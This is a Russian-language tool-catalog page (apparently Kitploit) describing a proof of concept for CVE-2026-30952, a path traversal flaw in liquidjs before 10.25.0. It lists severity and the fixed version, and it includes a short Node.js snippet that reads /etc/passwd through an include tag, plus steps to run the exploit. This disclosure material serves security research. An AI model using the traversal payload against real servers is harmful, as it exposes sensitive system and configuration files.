Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-30952-PoC — PoC для CVE-2026-30952: уязвимость Path Traversal в liquidjs через абсолютные пути в тегах layout, render и include. | Kitploit
Инструменты/GitHubGitHub/morielharush/cve-2026-30952-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасность
GitHubmorielharush/cve-2026-30952-poc

CVE-2026-30952-PoC

PoC для CVE-2026-30952: уязвимость Path Traversal в liquidjs через абсолютные пути в тегах layout, render и include.

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-30952: PoC обхода пути в LiquidJS

Этот репозиторий содержит Proof of Concept (PoC) для CVE-2026-30952 — уязвимости обхода пути с высоким уровнем серьезности, обнаруженной в библиотеке liquidjs (версии < 10.25.0).

Авторы и исследователи:

Moriel Harush Maor Caplan

Описание

Уязвимость позволяет произвольный доступ к файлам через теги layout, render и include, когда они используются с абсолютными путями. Это происходит даже при указании корневого каталога root, поскольку механизм резервного поиска в библиотеке не выполняет надлежащую проверку того, что разрешенный путь остается в пределах заданного корневого каталога.

Воздействие: Злоумышленник может прочитать конфиденциальные файлы (например, /etc/passwd, файлы окружения), если он может контролировать содержимое шаблона или переменную, передаваемую в эти теги.


Детали уязвимости

  • ID CVE: CVE-2026-30952
  • ID GHSA: GHSA-wmfp-5q7x-987x
  • Серьезность: Высокая (8.7/10 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
  • Затронутые версии: < 10.25.0
  • Исправленная версия: 10.25.0

Proof of Concept (PoC)

root@kitploit:~
const { Liquid } = require('liquidjs');
const e = new Liquid({ root: ['/tmp'], partials: ['/tmp'], dynamicPartials: true });
e.parseAndRender('{% include page %}', { page: '../../../etc/passwd' }).then(o => console.log(o.slice(0,500)));
image

Предварительные требования

  • Установленный Node.js
  • Уязвимая версия liquidjs (npm install [email protected])

Шаги для воспроизведения

  1. Клонируйте этот репозиторий.
  2. Выполните npm install.
  3. Запустите скрипт эксплойта:
    root@kitploit:~
    node exploit.js
    
Скачать инструмент